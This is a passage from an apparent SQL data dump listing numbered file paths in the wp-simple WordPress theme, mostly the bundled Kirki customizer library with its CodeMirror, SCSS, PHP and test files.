p-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/edit/matchbrackets.js'),(6250,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/edit/matchtags.js'),(6251,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/edit/trailingspace.js'),(6252,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/brace-fold.js'),(6253,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/comment-fold.js'),(6254,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/foldcode.js'),(6255,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/foldgutter.css'),(6256,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/foldgutter.js'),(6257,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/indent-fold.js'),(6258,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/markdown-fold.js'),(6259,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/xml-fold.js'),(6260,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/anyword-hint.js'),(6261,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/css-hint.js'),(6262,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/html-hint.js'),(6263,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/javascript-hint.js'),(6264,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/show-hint.css'),(6265,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/show-hint.js'),(6266,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/sql-hint.js'),(6267,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/xml-hint.js'),(6268,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/coffeescript-lint.js'),(6269,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/css-lint.js'),(6270,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/html-lint.js'),(6271,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/javascript-lint.js'),(6272,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/json-lint.js'),(6273,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/lint.css'),(6274,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/lint.js'),(6275,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/yaml-lint.js'),(6276,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/merge/merge.css'),(6277,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/merge/merge.js'),(6278,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/mode/loadmode.js'),(6279,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/mode/multiplex.js'),(6280,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/mode/multiplex_test.js'),(6281,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/mode/overlay.js'),(6282,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/mode/simple.js'),(6283,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/runmode/colorize.js'),(6284,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/runmode/runmode-standalone.js'),(6285,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/runmode/runmode.js'),(6286,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/runmode/runmode.node.js'),(6287,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/scroll/annotatescrollbar.js'),(6288,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/scroll/scrollpastend.js'),(6289,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/scroll/simplescrollbars.css'),(6290,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/scroll/simplescrollbars.js'),(6291,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/search/match-highlighter.js'),(6292,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/search/matchesonscrollbar.css'),(6293,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/search/matchesonscrollbar.js'),(6294,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/search/search.js'),(6295,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/search/searchcursor.js'),(6296,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/selection/active-line.js'),(6297,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/selection/mark-selection.js'),(6298,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/selection/selection-pointer.js'),(6299,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/tern/tern.css'),(6300,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/tern/tern.js'),(6301,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/tern/worker.js'),(6302,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/wrap/hardwrap.js'),(6303,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/bin/authors.sh'),(6304,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/bin/compress'),(6305,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/bin/lint'),(6306,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/bin/release'),(6307,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/bin/source-highlight'),(6308,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/keymap/emacs.js'),(6309,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/keymap/sublime.js'),(6310,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/keymap/vim.js'),(6311,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/lib/codemirror.css'),(6312,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/lib/codemirror.js'),(6313,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/coffeescript/coffeescript.js'),(6314,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/coffeescript/index.html'),(6315,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/css.js'),(6316,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/gss.html'),(6317,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/gss_test.js'),(6318,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/index.html'),(6319,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/less.html'),(6320,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/less_test.js'),(6321,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/scss.html'),(6322,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/scss_test.js'),(6323,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/test.js'),(6324,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/haml/haml.js'),(6325,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/haml/index.html'),(6326,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/haml/test.js'),(6327,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/htmlembedded/htmlembedded.js'),(6328,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/htmlembedded/index.html'),(6329,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/htmlmixed/htmlmixed.js'),(6330,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/htmlmixed/index.html'),(6331,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/index.html'),(6332,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/javascript/index.html'),(6333,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/javascript/javascript.js'),(6334,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/javascript/json-ld.html'),(6335,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/javascript/test.js'),(6336,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/javascript/typescript.html'),(6337,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/markdown/index.html'),(6338,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/markdown/markdown.js'),(6339,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/markdown/test.js'),(6340,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/meta.js'),(6341,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/php/index.html'),(6342,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/php/php.js'),(6343,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/php/test.js'),(6344,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/sass/index.html'),(6345,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/sass/sass.js'),(6346,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/smarty/index.html'),(6347,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/smarty/smarty.js'),(6348,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/sql/index.html'),(6349,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/sql/sql.js'),(6350,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/stylus/index.html'),(6351,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/stylus/stylus.js'),(6352,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/textile/index.html'),(6353,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/textile/test.js'),(6354,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/textile/textile.js'),(6355,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/twig/index.html'),(6356,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/twig/twig.js'),(6357,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/xml/index.html'),(6358,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/xml/test.js'),(6359,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/xml/xml.js'),(6360,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/yaml/index.html'),(6361,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/yaml/yaml.js'),(6362,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/theme/kirki-dark.css'),(6363,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/theme/kirki-light.css'),(6364,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/selectize.js'),(6365,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/serialize.js'),(6366,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/tinymce.plugin.code.js'),(6367,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/wp-color-picker-alpha.js'),(6368,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/checkbox.scss'),(6369,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/code.scss'),(6370,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/color-palette.scss'),(6371,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/color.scss'),(6372,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/dashicons.scss'),(6373,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/date.scss'),(6374,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/dimension.scss'),(6375,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/editor.scss'),(6376,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/generic.scss'),(6377,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/multicheck.scss'),(6378,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/multicolor.scss'),(6379,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/number.scss'),(6380,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/palette.scss'),(6381,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/radio-buttonset.scss'),(6382,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/radio-image.scss'),(6383,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/radio.scss'),(6384,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/repeater.scss'),(6385,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/select.scss'),(6386,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/slider.scss'),(6387,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/sortable.scss'),(6388,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/spacing.scss'),(6389,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/switch.scss'),(6390,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/toggle.scss'),(6391,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/typography.scss'),(6392,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/customizer.scss'),(6393,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/global.scss'),(6394,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/panels/expanded.scss'),(6395,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/sections/expanded.scss'),(6396,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/sections/hover.scss'),(6397,'wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/tooltips.scss'),(6398,'wp-content/themes/wp-simple/inc/kirki/kirki/autoloader.php'),(6399,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-active-callback.php'),(6400,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-config.php'),(6401,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-control.php'),(6402,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-customize-control.php'),(6403,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-enqueue.php'),(6404,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-explode-background-field.php'),(6405,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-field.php'),(6406,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-fonts-google.php'),(6407,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-fonts.php'),(6408,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-helper.php'),(6409,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-init.php'),(6410,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-l10n.php'),(6411,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-panel.php'),(6412,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-sanitize-values.php'),(6413,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-scripts-registry.php'),(6414,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-section.php'),(6415,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-selective-refresh.php'),(6416,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-settings.php'),(6417,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-toolkit.php'),(6418,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-values.php'),(6419,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki.php'),(6420,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-checkbox-control.php'),(6421,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-code-control.php'),(6422,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-color-control.php'),(6423,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-color-palette-control.php'),(6424,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-custom-control.php'),(6425,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-dashicons-control.php'),(6426,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-date-control.php'),(6427,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-dimension-control.php'),(6428,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php'),(6429,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-editor-control.php'),(6430,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-generic-control.php'),(6431,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-multicheck-control.php'),(6432,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-multicolor-control.php'),(6433,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-number-control.php'),(6434,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-palette-control.php'),(6435,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-preset-control.php'),(6436,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-radio-buttonset-control.php'),(6437,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-radio-control.php'),(6438,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-radio-image-control.php'),(6439,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-repeater-control.php'),(6440,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-select-control.php'),(6441,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-slider-control.php'),(6442,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-sortable-control.php'),(6443,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-spacing-control.php'),(6444,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-switch-control.php'),(6445,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-toggle-control.php'),(6446,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-typography-control.php'),(6447,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/deprecated.php'),(6448,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/dynamic-css.php'),(6449,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-checkbox.php'),(6450,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-code.php'),(6451,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-color-alpha.php'),(6452,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-color-palette.php'),(6453,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-color.php'),(6454,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-custom.php'),(6455,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-dashicons.php'),(6456,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-date.php'),(6457,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-dimension.php'),(6458,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-dropdown-pages.php'),(6459,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-editor.php'),(6460,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-generic.php'),(6461,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-group-title.php'),(6462,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-image.php'),(6463,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-kirki-generic.php'),(6464,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-multicheck.php'),(6465,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-multicolor.php'),(6466,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-number.php'),(6467,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-palette.php'),(6468,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-preset.php'),(6469,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-radio-buttonset.php'),(6470,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-radio-image.php'),(6471,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-radio.php'),(6472,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-select.php'),(6473,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-select2-multiple.php'),(6474,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-select2.php'),(6475,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-slider.php'),(6476,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-sortable.php'),(6477,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-spacing.php'),(6478,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-switch.php'),(6479,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-text.php'),(6480,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-textarea.php'),(6481,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-toggle.php'),(6482,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-typography.php'),(6483,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-upload.php'),(6484,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/lib/class-aricolor.php'),(6485,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/lib/class-kirki-color.php'),(6486,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/class-kirki-output.php'),(6487,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/field/class-kirki-output-field-multicolor.php'),(6488,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/field/class-kirki-output-field-spacing.php'),(6489,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/field/class-kirki-output-field-typography.php'),(6490,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/property/class-kirki-output-property-background-image.php'),(6491,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/property/class-kirki-output-property-background-position.php'),(6492,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/property/class-kirki-output-property-font-family.php'),(6493,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/property/class-kirki-output-property.php'),(6494,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/panels/class-kirki-panels-default-panel.php'),(6495,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/panels/class-kirki-panels-expanded-panel.php'),(6496,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/scripts/class-kirki-scripts-icons.php'),(6497,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/scripts/class-kirki-scripts-loading.php'),(6498,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/scripts/class-kirki-scripts-tooltips.php'),(6499,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/sections/class-kirki-sections-default-section.php'),(6500,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/sections/class-kirki-sections-expanded-section.php'),(6501,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/sections/class-kirki-sections-hover-section.php'),(6502,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/settings/class-kirki-settings-default-setting.php'),(6503,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/settings/class-kirki-settings-repeater-setting.php'),(6504,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/styles/class-kirki-styles-customizer.php'),(6505,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/styles/class-kirki-styles-frontend.php'),(6506,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/styles/class-kirki-styles-output-css.php'),(6507,'wp-content/themes/wp-simple/inc/kirki/kirki/includes/webfonts.php'),(6508,'wp-content/themes/wp-simple/inc/kirki/kirki/kirki.php'),(6509,'wp-content/themes/wp-simple/inc/kirki/kirki/package.json'),(6510,'wp-content/themes/wp-simple/inc/kirki/kirki/readme.txt'),(6511,'wp-content/themes/wp-simple/inc/kirki/kirki.php'),(6512,'wp-content/themes/wp-simple/inc/kirki/package.json'),(6513,'wp-content/themes/wp-simple/inc/kirki/phpunit.xml'),(6514,'wp-content/themes/wp-simple/inc/kirki/readme.txt'),(6515,'wp-content/themes/wp-simple/inc/kirki/tests/bin/install-wp-tests.sh'),(6516,'wp-content/themes/wp-simple/inc/kirki/tests/test-aricolor.php'),(6517,'wp-content/themes/wp-simple/inc/kirki/tests/test-bootstrap.php'),(6518,'wp-content/themes/wp-simple/inc/kirki/tests/test-deprecated.php'),(6519,'wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-add_config.php'),(6520,'wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-add_field.php'),(6521,'wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-add_panel.php'),(6522,'wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-add_section.php'),(6523,'wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-color.php'),(6524,'wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-customizer-scripts-icons.php'),(6525,'wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-customizer-scripts-tooltips.php'),(6526,'wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-field.php'),(6527,'wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-fonts.php'),(6528,'wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-helper.php'),(6529,'wp-content/themes/wp-simple/inc/meta_boxes.php'),(6530,'wp-content/themes/wp-simple/inc/options.php'),(6531,'wp-content/themes/wp-simple/inc/pro/class-customize.php'),(6532,'wp-content/themes/wp-simple/inc/pro/customize-controls.css'),(6533,'wp-content/themes/wp-simple/inc/pro/customize-controls.js'),(6534,'wp-content/themes/wp-simple/inc/pro/section-pro.php'),(6535,'wp-content/themes/wp-simple/inc/widgets.php'),(6536,'wp-content/themes/wp-simple/inc/wp_bootstrap_navwalker.php'),(6537,'wp-content/themes/wp-simple/index.php'),(6538,'wp-content/themes/wp-simple/lang/readme.txt'),(6539,'wp-content/themes/wp-simple/parts/blog-pagination.php'),(6540,'wp-content/themes/wp-simple/parts/content-blog.php'),(6541,'wp-content/themes/wp-simple/parts/content-page.php'),(6542,'wp-content/themes/wp-simple/parts/content-single.php'),(6543,'wp-content/themes/wp-simple/parts/error-404.php'),(6544,'wp-content/themes/